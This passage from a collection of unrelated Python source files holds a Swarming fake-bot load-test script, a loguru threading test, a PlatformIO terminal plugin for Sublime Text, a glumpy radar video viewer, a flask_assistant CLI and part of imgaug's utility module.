progress, duration, events, kill_event):
self._lock = threading.Lock()
self._swarming = swarming_url
self._index = index
self._progress = progress
self._duration = duration
self._events = events
self._kill_event = kill_event
self._bot_id = '%s-%d' % (hostname, index)
self._attributes = {
'dimensions': dimensions,
'id': self._bot_id,
# TODO(maruel): Use os_utilities.py.
'ip': '127.0.0.1',
'try_count': 0,
'version': swarm_bot_version_hash,
}
self._thread = threading.Thread(target=self._run, name='bot%d' % index)
self._thread.daemon = True
self._thread.start()
def join(self):
self._thread.join()
def is_alive(self):
return self._thread.is_alive()
def _run(self):
"""Polls the server and fake execution."""
try:
self._progress.update_item('%d alive' % self._index, bots=1)
while True:
if self._kill_event.is_set():
return
data = {'attributes': json.dumps(self._attributes)}
request = net.url_open(self._swarming + '/poll_for_test', data=data)
if request is None:
self._events.put('poll_for_test_empty')
continue
start = time.time()
try:
manifest = json.load(request)
except ValueError:
self._progress.update_item('Failed to poll')
self._events.put('poll_for_test_invalid')
continue
commands = [c['function'] for c in manifest.get('commands', [])]
if not commands:
# Nothing to run.
self._events.put('sleep')
time.sleep(manifest['come_back'])
continue
if commands == ['UpdateSlave']:
# Calculate the proper SHA-1 and loop again.
# This could happen if the Swarming server is upgraded while this
# script runs.
self._attributes['version'] = calculate_version(
manifest['commands'][0]['args'])
self._events.put('update_slave')
continue
if commands != ['RunManifest']:
self._progress.update_item(
'Unexpected RPC call %s\n%s' % (commands, manifest))
self._events.put('unknown_rpc')
break
store_cmd = manifest['commands'][0]
if not isinstance(store_cmd['args'], unicode):
self._progress.update_item('Unexpected RPC manifest\n%s' % manifest)
self._events.put('unknown_args')
break
result_url = manifest['result_url']
test_run = json.loads(store_cmd['args'])
if result_url != test_run['result_url']:
self._progress.update_item(
'Unexpected result url: %s != %s' %
(result_url, test_run['result_url']))
self._events.put('invalid_result_url')
break
ping_url = test_run['ping_url']
ping_delay = test_run['ping_delay']
self._progress.update_item('%d processing' % self._index, processing=1)
# Fake activity and send pings as requested.
while True:
remaining = max(0, (start + self._duration) - time.time())
if remaining > ping_delay:
# Include empty data to ensure the request is a POST request.
result = net.url_read(ping_url, data={})
assert result == 'Success.', result
remaining = max(0, (start + self._duration) - time.time())
if not remaining:
break
time.sleep(remaining)
# In the old API, r=<task_id>&id=<bot_id> is passed as the url.
data = {
'o': TASK_OUTPUT,
'x': '0',
}
result = net.url_read(manifest['result_url'], data=data)
self._progress.update_item(
'%d processed' % self._index, processing=-1, processed=1)
if not result:
self._events.put('result_url_fail')
else:
assert result == 'Successfully update the runner results.', result
self._events.put(time.time() - start)
finally:
try:
# Unregister itself. Otherwise the server will have tons of fake slaves
# that the admin will have to remove manually.
response = net.url_open(
self._swarming + '/delete_machine_stats',
data=[('r', self._bot_id)])
if not response:
self._events.put('failed_unregister')
else:
response.read()
finally:
self._progress.update_item('%d quit' % self._index, bots=-1)
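# Illustrative sketch (hypothetical values, nothing here is executed): a single
# FakeSwarmBot can be driven outside of main() roughly like this.
#
#   progress = threading_utils.Progress([('processing', 0), ('processed', 0), ('bots', 0)])
#   events = Queue.Queue()
#   kill_event = threading.Event()
#   bot = FakeSwarmBot(
#       'https://swarming.example.com', [('os', OS_NAME)], 'deadbeef',
#       get_hostname(), 0, progress, 1.0, events, kill_event)
#   kill_event.set()  # asks the polling loop in _run() to stop
#   bot.join()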
def main():
colorama.init()
parser = optparse.OptionParser(description=sys.modules[__name__].__doc__)
parser.add_option(
'-S', '--swarming',
metavar='URL', default='',
help='Swarming server to use')
parser.add_option(
'--suffix', metavar='NAME', default='', help='Bot suffix name to use')
swarming.add_filter_options(parser)
  # Use improbable values to reduce the chance of interfering with real slaves.
parser.set_defaults(
dimensions=[
('cpu', ['arm36']),
('hostname', socket.getfqdn()),
('os', OS_NAME),
])
group = optparse.OptionGroup(parser, 'Load generated')
group.add_option(
'--slaves', type='int', default=300, metavar='N',
help='Number of swarm bot slaves, default: %default')
group.add_option(
'-c', '--consume', type='float', default=60., metavar='N',
help='Duration (s) for consuming a request, default: %default')
parser.add_option_group(group)
group = optparse.OptionGroup(parser, 'Display options')
group.add_option(
'--columns', type='int', default=graph.get_console_width(), metavar='N',
help='For histogram display, default:%default')
group.add_option(
'--buckets', type='int', default=20, metavar='N',
help='Number of buckets for histogram display, default:%default')
parser.add_option_group(group)
parser.add_option(
'--dump', metavar='FOO.JSON', help='Dumps to json file')
parser.add_option(
'-v', '--verbose', action='store_true', help='Enables logging')
options, args = parser.parse_args()
logging.basicConfig(level=logging.INFO if options.verbose else logging.FATAL)
if args:
parser.error('Unsupported args: %s' % args)
options.swarming = options.swarming.rstrip('/')
if not options.swarming:
parser.error('--swarming is required.')
if options.consume <= 0:
parser.error('Needs --consume > 0. 0.01 is a valid value.')
swarming.process_filter_options(parser, options)
print(
'Running %d slaves, each task lasting %.1fs' % (
options.slaves, options.consume))
print('Ctrl-C to exit.')
print('[processing/processed/bots]')
columns = [('processing', 0), ('processed', 0), ('bots', 0)]
progress = threading_utils.Progress(columns)
events = Queue.Queue()
start = time.time()
kill_event = threading.Event()
swarm_bot_version_hash = calculate_version(options.swarming + '/bot_code')
hostname = get_hostname()
if options.suffix:
hostname += '-' + options.suffix
slaves = [
FakeSwarmBot(
options.swarming, options.dimensions, swarm_bot_version_hash, hostname, i,
progress, options.consume, events, kill_event)
for i in range(options.slaves)
]
try:
# Wait for all the slaves to come alive.
while not all(s.is_alive() for s in slaves):
time.sleep(0.01)
progress.update_item('Ready to run')
while slaves:
progress.print_update()
time.sleep(0.01)
# The slaves could be told to die.
slaves = [s for s in slaves if s.is_alive()]
except KeyboardInterrupt:
kill_event.set()
progress.update_item('Waiting for slaves to quit.', raw=True)
progress.update_item('')
while slaves:
progress.print_update()
slaves = [s for s in slaves if s.is_alive()]
# At this point, progress is not used anymore.
print('')
print('Ran for %.1fs.' % (time.time() - start))
print('')
results = list(events.queue)
print_results(results, options.columns, options.buckets)
if options.dump:
with open(options.dump, 'w') as f:
json.dump(results, f, separators=(',',':'))
return 0
if __name__ == '__main__':
sys.exit(main())
|
test_threading.py
|
from threading import Thread
from loguru import logger
import time
def test_safe(capsys):
first_thread_initialized = False
second_thread_initialized = False
entered = False
output = ""
def non_safe_sink(msg):
nonlocal entered
nonlocal output
assert not entered
entered = True
time.sleep(1)
entered = False
output += msg
def first_thread():
nonlocal first_thread_initialized
first_thread_initialized = True
time.sleep(1)
assert second_thread_initialized
logger.debug("message 1")
def second_thread():
nonlocal second_thread_initialized
second_thread_initialized = True
time.sleep(1)
assert first_thread_initialized
time.sleep(0.5)
logger.debug("message 2")
logger.start(non_safe_sink, format="{message}", catch=False)
threads = [Thread(target=first_thread), Thread(target=second_thread)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
out, err = capsys.readouterr()
assert out == err == ""
assert output == "message 1\nmessage 2\n"
|
timeitTest.py
|
# timeitTest.py
import threading
import random
import time
def myWorker():
for i in range(5):
print("Starting wait time")
time.sleep(random.randint(1,5))
print("Completed Wait")
thread1 = threading.Thread(target=myWorker)
thread2 = threading.Thread(target=myWorker)
thread3 = threading.Thread(target=myWorker)
thread1.start()
thread2.start()
thread3.start()
thread1.join()
thread2.join()
thread3.join()
|
pio_terminal.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sublime
import sublime_plugin
from threading import Thread
from time import sleep
from ..libraries import tools
from ..libraries.messages import Messages
from ..platformio.command import Command
from ..libraries.thread_progress import ThreadProgress
from ..libraries.I18n import I18n
class PioTerminal(Command):
def __init__(self):
super(PioTerminal, self).__init__()
name = 'PlatformIO Terminal'
self.translate = I18n().translate
self.window, self.view = tools.findInOpendView(name)
header = self.check_header()
direction = tools.get_setting('terminal_direction', 'right')
self.messages = Messages()
self.messages.initial_text(header)
self.messages.panel_name(name)
self.messages.create_panel(direction=direction, in_file=True)
self.dprint = self.messages.print
def check_header(self):
"""Terminal eader
When the console is empty, it adds a string at the beginning
Returns:
str -- header string
"""
header = None
if(self.view is None or self.view.size() == 0):
header = "pio_terminal"
return header
def close_terminal(self):
"""Close Terminal
Close the PlatformIO console including the bottom panel
"""
if self.view is not None:
self.window.focus_view(self.view)
self.window.run_command("close")
self.window.run_command('destroy_pane', {'direction': 'self'})
def print_screen(self, text):
"""Print on screen
Print all the user interaction in the console (panel)
Arguments:
            text {str} -- text to append to the console
"""
self.dprint(text)
def show_input(self):
"""Show input
Shows an input to run the commands
"""
self.window.focus_view(self.view)
cap = ' $ '
self.window.show_input_panel(cap, '', self.nonblock_cmd, None, self.cancel_input)
def nonblock_cmd(self, cmd):
"""New thread command
Runs the 'send_cmd' method in a new thread to avoid crashes
and performance problems
Arguments:
cmd {str} -- command to run
"""
thread = Thread(target=self.send_cmd, args=(cmd,))
thread.start()
ThreadProgress(thread, self.translate('processing'), '')
def cancel_input(self):
"""Cancel queue
        Cancels the message queue when the input panel is cancelled (Esc key)
"""
def send_cmd(self, cmd):
"""Process command
        Processes the different commands sent by the user. It first checks if the
        command is a deviot command (remove or create a folder, list a directory,
        etc.). If the command starts with 'pio' or 'platformio' it executes the
        command, otherwise it displays a "command not found" message.
Arguments:
cmd {str} -- command to execute
"""
if(not cmd):
return
self.dprint("\n$ {0} \n".format(cmd))
sleep(0.03)
if(self.deviot_commands(cmd)):
self.show_input()
return
cmd = cmd.replace('pio ', '').replace('platformio ', '')
cmd = cmd.split(" ")
self.cwd = os.getcwd()
self.init(extra_name="Pio Terminal 2.0", messages=self.messages)
self.run_command(cmd, in_file=True)
self.show_input()
def deviot_commands(self, cmd):
"""Custom commands
        Custom commands to interact with the system; they include
        creating and removing a folder, listing directories, clearing the
        console view, and others. Use the 'help' command to see the complete list.
        Arguments:
            cmd {str} -- command string
        Returns:
            bool -- True if the command was executed, False if it wasn't recognised
"""
cmd_return = True
if(len(cmd.split(" ")) > 1):
cmd = cmd.split(" ")
args = " ".join(cmd[1:])
if('help' == cmd):
self.help_cmd()
elif('clear' in cmd):
self.clear_cmd()
elif('cwd' in cmd):
self.show_cwd()
elif('cd' in cmd):
self.set_cwd(cmd[1])
elif('ls' in cmd):
self.list_cwd()
elif('mk' in cmd):
self.mk_cwd(cmd[1])
elif('rm' in cmd):
self.rm_cwd(cmd[1])
elif('pio' in cmd or 'platformio' in cmd):
cmd_return = False
else:
self.dprint("invalid_command")
self.show_input()
return cmd_return
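    # Illustrative example session (hypothetical input/output, nothing here is
    # executed): the custom commands handled above behave roughly like this.
    #
    #   $ cwd        -> prints the current working directory
    #   $ cd src     -> changes into the 'src' folder (if it exists)
    #   $ ls         -> lists files and folders in the current path
    #   $ mk build   -> creates a 'build' folder
    #   $ rm build   -> removes the 'build' folder
    #   $ pio run    -> forwarded to PlatformIO (cmd_return is False)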
def help_cmd(self):
"""List of cmomands
Shows a list of all commands availables and the description of each one
"""
from ..libraries.I18n import I18n
width = 15
cmd_string = ["cwd", "cd", "ls", "mk", "rm", "clear", "pio --help"]
cmd_descript = ["cmd_cwd", "cmd_cd", "cmd_ls", "cmd_mk", "cmd_rm", "cmd_clear", "cmd_pio_help"]
for cmd, description in zip(cmd_string, cmd_descript):
description = I18n().translate(description)
self.dprint("{}: {}".format(cmd.ljust(width), str(description).ljust(width)))
def clear_cmd(self):
"""Clean view
Cleans the console view
"""
self.window.focus_view(self.view)
self.view.set_read_only(False)
self.window.run_command("deviot_clean_view")
self.view.set_read_only(True)
header = self.check_header()
self.dprint(header)
def show_cwd(self):
"""Currente directory
Prints the current working directory
"""
cwd = os.getcwd()
self.dprint(cwd + '\n')
def set_cwd(self, path):
"""Set directory
Sets the current working directory.
Arguments:
path {str} -- folder name (not full path)
"""
cwd = os.getcwd()
cwd = os.path.join(cwd, path)
if(not os.path.isdir(cwd)):
self.dprint('invalid_path')
return
os.chdir(path)
cwd = os.getcwd()
self.dprint(cwd + '\n')
def list_cwd(self):
"""List of files and directories
Shows the list of files and directories in the current working path
"""
from glob import glob
cwd = os.getcwd()
cwd = os.path.join(cwd, '*')
for current in glob(cwd):
self.dprint(current + '\n')
def mk_cwd(self, path):
"""Make folder
Creates a new folder in the current working path
Arguments:
path {str} -- name of the folder to create (not full path)
"""
cwd = os.getcwd()
cwd = os.path.join(cwd, path)
try:
os.makedirs(path)
self.dprint("created{0}", path)
except:
self.dprint("error_making_folder")
def rm_cwd(self, path):
"""Remove folder
Removes the folder in the current working path
Arguments:
path {str} -- folder name to remove (not full path)
"""
from shutil import rmtree
cwd = os.getcwd()
cwd = os.path.join(cwd, path)
try:
rmtree(cwd)
self.dprint("removed{0}", path)
except:
self.dprint("wrong_folder_name")
|
video.py
|
#-----------------------------------------------------------------------------
# Copyright (c) 2014, Ryan Volz
# All rights reserved.
#
# Distributed under the terms of the BSD 3-Clause ("BSD New") license.
#
# The full license is in the LICENSE file, distributed with this software.
#-----------------------------------------------------------------------------
import numpy as np
import glumpy
import threading
import time
__all__ = ['Video']
class Video(object):
def __init__(self, gen, npulses=1000, vmin=0, vmax=30, winsize=(1450, 800)):
self.gen = gen
self.npulses = npulses
self.figure = glumpy.Figure(winsize)
self.figure.event('on_mouse_motion')(self.on_mouse_motion)
self.figure.event('on_mouse_scroll')(self.on_mouse_scroll)
self.figure.event('on_key_press')(self.on_key_press)
self.figure.timer(30.0)(self.draw) # 30 works, more seems to result in skips
self.pause = [False, False]
self.stop = False
self.loc_scale = [0, 0, 1]
# initialize image
dat = self.gen.next()
self.Z = np.zeros((len(dat), npulses), dtype=np.float32)
self.Z[:, 0] = dat
self.I = glumpy.Image(self.Z, interpolation='nearest',
colormap=glumpy.colormap.IceAndFire, origin='lower',
vmin=vmin, vmax=vmax)
def on_mouse_motion(self, x, y, dx, dy):
zoom = self.loc_scale[2]
x = x/float(self.figure.width)
y = y/float(self.figure.height)
x = min(max(x,0),1)
y = min(max(y,0),1)
self.loc_scale[0] = x*self.figure.width*(1-zoom)
self.loc_scale[1] = y*self.figure.height*(1-zoom)
self.figure.redraw()
def on_mouse_scroll(self, x, y, scroll_x, scroll_y):
zoom = self.loc_scale[2]
if scroll_y > 0:
zoom *= 1.25
elif scroll_y < 0:
zoom /= 1.25
self.loc_scale[2] = min(max(zoom, 1), 20)
self.on_mouse_motion(x, y, 0, 0)
def draw(self, dt):
self.figure.clear()
self.I.update()
x,y,s = self.loc_scale
self.I.draw(x, y, 0, s*self.figure.width, s*self.figure.height)
self.figure.redraw()
def on_key_press(self, key, modifiers):
if key == glumpy.window.key.P or key == glumpy.window.key.SPACE:
self.pause[0] = not self.pause[0]
self.pause[1] = False
return True
if key == glumpy.window.key.Q or key == glumpy.window.key.ESCAPE:
self.stop = True
def _plottingthread(self):
time.sleep(1)
block_size = self.npulses
w = self.Z.shape[1]
for pulse_num, dat in enumerate(self.gen):
bn = (pulse_num + 1) % w # offset by 1 because we already read first pulse in __init__
self.Z[:, bn] = np.flipud(dat)
while self.pause[0]:
if not self.pause[1]:
print pulse_num + 1 # offset by 1 because we already read first pulse in __init__
self.pause[1] = True
time.sleep(1)
if self.stop:
break
def play(self):
t = threading.Thread(target=self._plottingthread)
t.start()
self.figure.show()
t.join()
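# Illustrative sketch (hypothetical generator, nothing here is executed): Video
# expects a generator that yields one 1-D array of sample values per pulse.
#
#   def fake_pulses(nsamples=512):
#       while True:
#           yield 10 * np.log10(np.random.rand(nsamples) + 1e-6) + 30
#
#   Video(fake_pulses(), npulses=500, vmin=0, vmax=30).play()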
|
cli.py
|
from __future__ import absolute_import
import sys
import logging
from flask_assistant.utils import get_assistant
from .schema_handlers import IntentGenerator, EntityGenerator, TemplateCreator
from .api import ApiAi
from . import logger
from multiprocessing import Process
logger.setLevel(logging.INFO)
api = ApiAi()
raise DeprecationWarning(
"Schema generation and management is not yet available for Dialogflow V2, please define intents and entities in the Dialogflow console"
)
def file_from_args():
try:
return sys.argv[1]
except IndexError:
raise IndexError("Please provide the file containing the Assistant object")
def gen_templates():
filename = file_from_args()
assist = get_assistant(filename)
templates = TemplateCreator(assist)
templates.generate()
def intents():
logger.info("Getting Registered Intents...")
filename = file_from_args()
assist = get_assistant(filename)
intents = assist.api.agent_intents
for i in intents:
logger.info(i.name)
return intents
def entities():
logger.info("Getting Registered Entities...")
filename = file_from_args()
assist = get_assistant(filename)
ents = assist.api.agent_entities
for i in ents:
logger.info(i.name)
return ents
def schema():
filename = file_from_args()
assist = get_assistant(filename)
intents = IntentGenerator(assist)
entities = EntityGenerator(assist)
templates = TemplateCreator(assist)
templates.generate()
intents.generate()
entities.generate()
def check():
filename = file_from_args()
assist = get_assistant(filename)
# reg_total = len(assist.api.agent_intents)
# map_total = len(assist._intent_action_funcs)
reg_names = [i.name for i in assist.api.agent_intents]
map_names = [i for i in assist._intent_action_funcs.keys()]
extra_reg = set(reg_names) - set(map_names)
extra_map = set(map_names) - set(reg_names)
if extra_reg != set():
print(
"\nThe following Intents are registered but not mapped to an action function:"
)
print(extra_reg)
print()
else:
print("\n All registered intents are mapped\n")
if extra_map != set():
print(
"\nThe Following Intents are mapped to an action fucntion, but not registered: "
)
print(extra_map)
print()
else:
print("\n All mapped intents are regitsered\n")
print("Registered Entities:")
print([i.name for i in assist.api.agent_entities])
def query():
filename = file_from_args()
assist = get_assistant(filename)
p = Process(target=assist.app.run)
p.start()
while True:
q = input("Enter query...\n")
resp = assist.api.post_query(q).json()
try:
print("Matched: {}".format(resp["result"]["metadata"]["intentName"]))
print("Params: {}".format(resp["result"]["parameters"]))
print(resp["result"]["fulfillment"]["speech"])
except KeyError:
logger.error("Error:")
logger.error(resp["status"])
|
imgaug.py
|
from __future__ import print_function, division, absolute_import
import random
import numpy as np
import copy
import numbers
import cv2
import math
from scipy import misc, ndimage
import multiprocessing
import threading
import traceback
import sys
import six
import six.moves as sm
import os
import skimage.draw
import skimage.measure
import collections
import time
if sys.version_info[0] == 2:
import cPickle as pickle
from Queue import Empty as QueueEmpty, Full as QueueFull
elif sys.version_info[0] == 3:
import pickle
from queue import Empty as QueueEmpty, Full as QueueFull
xrange = range
ALL = "ALL"
# filepath to the quokka image
QUOKKA_FP = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"quokka.jpg"
)
DEFAULT_FONT_FP = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"DejaVuSans.ttf"
)
# We instantiate a current/global random state here once.
# One can also call np.random, but that is (in contrast to np.random.RandomState)
# a module and hence cannot be copied via deepcopy. That's why we use RandomState
# here (and in all augmenters) instead of np.random.
CURRENT_RANDOM_STATE = np.random.RandomState(42)
def is_np_array(val):
"""
Checks whether a variable is a numpy array.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a numpy array. Otherwise False.
"""
# using np.generic here seems to also fire for scalar numpy values even
# though those are not arrays
#return isinstance(val, (np.ndarray, np.generic))
return isinstance(val, np.ndarray)
def is_single_integer(val):
"""
Checks whether a variable is an integer.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is an integer. Otherwise False.
"""
return isinstance(val, numbers.Integral) and not isinstance(val, bool)
def is_single_float(val):
"""
Checks whether a variable is a float.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a float. Otherwise False.
"""
return isinstance(val, numbers.Real) and not is_single_integer(val) and not isinstance(val, bool)
def is_single_number(val):
"""
Checks whether a variable is a number, i.e. an integer or float.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a number. Otherwise False.
"""
return is_single_integer(val) or is_single_float(val)
def is_iterable(val):
"""
Checks whether a variable is iterable.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is an iterable. Otherwise False.
"""
return isinstance(val, collections.Iterable)
# TODO convert to is_single_string() or rename is_single_integer/float/number()
def is_string(val):
"""
Checks whether a variable is a string.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a string. Otherwise False.
"""
return isinstance(val, six.string_types)
def is_integer_array(val):
"""
Checks whether a variable is a numpy integer array.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a numpy integer array. Otherwise False.
"""
return is_np_array(val) and issubclass(val.dtype.type, np.integer)
def is_float_array(val):
"""
Checks whether a variable is a numpy float array.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a numpy float array. Otherwise False.
"""
return is_np_array(val) and issubclass(val.dtype.type, np.floating)
def is_callable(val):
"""
Checks whether a variable is a callable, e.g. a function.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a callable. Otherwise False.
"""
# python 3.x with x <= 2 does not support callable(), apparently
if sys.version_info[0] == 3 and sys.version_info[1] <= 2:
return hasattr(val, '__call__')
else:
return callable(val)
def caller_name():
"""
Returns the name of the caller, e.g. a function.
Returns
-------
name : str
The name of the caller as a string
"""
return sys._getframe(1).f_code.co_name
def seed(seedval):
"""
Set the seed used by the global random state and thereby all randomness
in the library.
    This random state is used by default by all augmenters. Under special
circumstances (e.g. when an augmenter is switched to deterministic mode),
the global random state is replaced by another -- local -- one.
The replacement is dependent on the global random state.
Parameters
----------
seedval : int
The seed to
use.
"""
CURRENT_RANDOM_STATE.seed(seedval)
def current_random_state():
"""
Returns the current/global random state of the library.
Returns
    -------
out : np.random.RandomState
The current/global random state.
"""
return CURRENT_RANDOM_STATE
def new_random_state(seed=None, fully_random=False):
"""
Returns a new random state.
Parameters
----------
seed : None or int, optional(default=None)
Optional seed value to use.
The same datatypes are allowed as for np.random.RandomState(seed).
fully_random : bool, optional(default=False)
Whether to use numpy's random initialization for the
RandomState (used if set to True). If False, a seed is sampled from
the global random state, which is a bit faster and hence the default.
Returns
-------
out : np.random.RandomState
The new random state.
"""
if seed is None:
if not fully_random:
# sample manually a seed instead of just RandomState(),
# because the latter one
# is way slower.
seed = CURRENT_RANDOM_STATE.randint(0, 10**6, 1)[0]
return np.random.RandomState(seed)
def dummy_random_state():
"""
Returns a dummy random state that is always based on a seed of 1.
Returns
-------
out : np.random.RandomState
The new random state.
"""
return np.random.RandomState(1)
def copy_random_state(random_state, force_copy=False):
"""
Creates a copy of a random state.
Parameters
----------
random_state : np.random.RandomState
The random state to
copy.
force_copy : bool, optional(default=False)
If True, this function will always create a copy of every random
state. If False, it will not copy numpy's default random state,
but all other random states.
Returns
-------
rs_copy : np.random.RandomState
The copied random state.
"""
if random_state == np.random and not force_copy:
return random_state
else:
rs_copy = dummy_random_state()
orig_state = random_state.get_state()
rs_copy.set_state(orig_state)
return rs_copy
def derive_random_state(random_state):
"""
Create a new random states based on an existing random state or seed.
Parameters
----------
random_state : np.random.RandomState
Random state or seed from which to derive the new random state.
Returns
-------
result : np.random.RandomState
Derived random state.
"""
return derive_random_states(random_state, n=1)[0]
# TODO use this everywhere instead of manual seed + create
def derive_random_states(random_state, n=1):
"""
Create N new random states based on an existing random state or seed.
Parameters
----------
random_state : np.random.RandomState
Random state or seed from which to derive new random states.
n : int, optional(default=1)
Number of random states to derive.
Returns
-------
result : list of np.random.RandomState
Derived random states.
"""
seed = random_state.randint(0, 10**6, 1)[0]
return [new_random_state(seed+i) for i in sm.xrange(n)]
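# Illustrative sketch (hypothetical helper, not called anywhere in this module):
# deriving reproducible child random states from one seeded parent state.
def _example_derive_random_states():
    parent = new_random_state(1234)
    child_a, child_b = derive_random_states(parent, n=2)
    # Both children are np.random.RandomState instances seeded from the parent,
    # so re-running with the same parent seed reproduces the same child streams.
    return child_a.uniform(), child_b.uniform()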
def forward_random_state(random_state):
"""
Forward the internal state of a random state.
This makes sure that future calls to the random_state will produce new random values.
Parameters
----------
random_state : np.random.RandomState
Random state to forward.
"""
random_state.uniform()
# TODO
# def from_json(json_str):
# pass
def quokka(size=None):
"""
Returns an image of a quokka as a numpy array.
Parameters
----------
size : None or float or tuple of two ints, optional(default=None)
Size of the output image. Input into scipy.misc.imresize.
Usually expected to be a tuple (H, W), where H is the desired height
and W is the width. If None, then the image will not be resized.
Returns
-------
img : (H,W,3) ndarray
The image array of dtype uint8.
"""
img = ndimage.imread(QUOKKA_FP, mode="RGB")
if size is not None:
img = misc.imresize(img, size)
return img
def quokka_square(size=None):
"""
    Returns a (square) image of a quokka as a numpy array.
Parameters
----------
size : None or float or tuple of two ints, optional(default=None)
Size of the output image. Input into scipy.misc.imresize.
Usually expected to be a tuple (H, W), where H is the desired height
and W is the width. If None, then the image will not be resized.
Returns
-------
img : (H,W,3) ndarray
The image array of dtype uint8.
"""
img = ndimage.imread(QUOKKA_FP, mode="RGB")
img = img[0:643, 0:643]
if size is not None:
img = misc.imresize(img, size)
return img
def angle_between_vectors(v1, v2):
"""
Returns the angle in radians between vectors 'v1' and 'v2'.
From http://stackoverflow.com/questions/2827393/angles-between-two-n-dimensional-vectors-in-python
Parameters
----------
{v1, v2} : (N,) ndarray
Input
vectors.
Returns
-------
out : float
Angle in radians.
Examples
--------
    >>> angle_between_vectors((1, 0, 0), (0, 1, 0))
    1.5707963267948966
    >>> angle_between_vectors((1, 0, 0), (1, 0, 0))
    0.0
    >>> angle_between_vectors((1, 0, 0), (-1, 0, 0))
3.141592653589793
"""
v1_u = v1 / np.linalg.norm(v1)
v2_u = v2 / np.linalg.norm(v2)
return np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0))
def draw_text(img, y, x, text, color=[0, 255, 0], size=25): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
"""
Draw text on an image.
This uses by default DejaVuSans as its font, which is included in the
library.
Parameters
----------
img : (H,W,3) ndarray
The image array to draw text on.
Expected to be of dtype uint8 or float32 (value range 0.0 to 255.0).
{y, x} : int
x- and y- coordinate of the top left corner of the
text.
color : iterable of 3 ints, optional(default=[0, 255, 0])
Color of the text to draw. For RGB-images this is expected to be
an RGB color.
size : int, optional(default=25)
Font size of the text to
draw.
Returns
-------
img_np : (H,W,3) ndarray
Input image with text drawn on it.
"""
# keeping PIL here so that it is not a dependency of the library right now
from PIL import Image, ImageDraw, ImageFont
do_assert(img.dtype in [np.uint8, np.float32])
input_dtype = img.dtype
if img.dtype == np.float32:
img = img.astype(np.uint8)
for i in range(len(color)):
val = color[i]
if isinstance(val, float):
val = int(val * 255)
val = np.clip(val, 0, 255)
color[i] = val
img = Image.fromarray(img)
font = ImageFont.truetype(DEFAULT_FONT_FP, size)
context = ImageDraw.Draw(img)
context.text((x, y), text, fill=tuple(color), font=font)
img_np = np.asarray(img)
img_np.setflags(write=True) # PIL/asarray returns read only array
if img_np.dtype != input_dtype:
img_np = img_np.astype(input_dtype)
return img_np
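# Illustrative sketch (hypothetical helper, not called anywhere in this module):
# annotating a blank image with draw_text(). This assumes Pillow is available,
# since draw_text() imports PIL lazily.
def _example_draw_text():
    img = np.zeros((64, 128, 3), dtype=np.uint8)
    # Draw green text near the top-left corner; the input image is not modified.
    return draw_text(img, y=4, x=4, text="example", color=[0, 255, 0], size=12)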
# TODO rename sizes to size?
def imresize_many_images(images, sizes=None, interpolation=None):
"""
Resize many images to a specified size.
Parameters
----------
images : (N,H,W,C) ndarray
Array of the images to resize.
Expected to usually be of dtype uint8.
sizes : float or iterable of two ints or iterable of two floats
The new size of the images, given either as a fraction (a single float) or as
a (height, width) tuple of two integers or as a (height fraction, width fraction)
tuple of two floats.
interpolation : None or string or int, optional(default=None)
The interpolation to use during resize.
If int, then expected to be one of:
* cv2.INTER_NEAREST (nearest neighbour interpolation)
* cv2.INTER_LINEAR (linear interpolation)
* cv2.INTER_AREA (area interpolation)
* cv2.INTER_CUBIC (cubic interpolation)
If string, then expected to be one of:
* "nearest" (identical to cv2.INTER_NEAREST)
* "linear" (identical to cv2.INTER_LINEAR)
* "area" (identical to cv2.INTER_AREA)
* "cubic" (identical to cv2.INTER_CUBIC)
If None, the interpolation will be chosen automatically. For size
increases, area interpolation will be picked and for size decreases,
linear interpolation will be picked.
Returns
-------
result : (N,H',W',C) ndarray
Array of the resized images.
Examples
--------
>>> imresize_many_images(np.zeros((2, 16, 16, 3), dtype=np.uint8), 2.0)
Converts 2 RGB images of height and width 16 to images of height and width 16*2 = 32.
>>> imresize_many_images(np.zeros((2, 16, 16, 3), dtype=np.uint8), (16, 32))
Converts 2 RGB images of height and width 16 to images of height 16 and width 32.
>>> imresize_many_images(np.zeros((2, 16, 16, 3), dtype=np.uint8), (2.0, 4.0))
Converts 2 RGB images of height and width 16 to images of height 32 and width 64.
"""
shape = images.shape
do_assert(images.ndim == 4, "Expected array of shape (N, H, W, C), got shape %s" % (str(shape),))
nb_images = shape[0]
im_height, im_width = shape[1], shape[2]
nb_channels = shape[3]
if is_single_float(sizes):
do_assert(sizes > 0.0)
height = int(round(im_height * sizes))
width = int(round(im_width * sizes))
else:
do_assert(len(sizes) == 2)
all_int = all([is_single_integer(size) for size in sizes])
all_float = all([is_single_float(size) for size in sizes])
do_assert(all_int or all_float)
if all_int:
height, width = sizes[0], sizes[1]
else:
height = int(round(im_height * sizes[0]))
width = int(round(im_width * sizes[1]))
if height == im_height and width == im_width:
return np.copy(images)
ip = interpolation
do_assert(ip is None or ip in ["nearest", "linear", "area", "cubic", cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_AREA, cv2.INTER_CUBIC])
if ip is None:
if height > im_height or width > im_width:
ip = cv2.INTER_AREA
else:
ip = cv2.INTER_LINEAR
elif ip in ["nearest", cv2.INTER_NEAREST]:
ip = cv2.INTER_NEAREST
elif ip in ["linear", cv2.INTER_LINEAR]:
ip = cv2.INTER_LINEAR
elif ip in ["area", cv2.INTER_AREA]:
ip = cv2.INTER_AREA
else: # if ip in ["cubic", cv2.INTER_CUBIC]:
ip = cv2.INTER_CUBIC
result = np.zeros((nb_images, height, width, nb_channels), dtype=images.dtype)
for img_idx in sm.xrange(nb_images):
# TODO fallback to scipy here if image isn't uint8
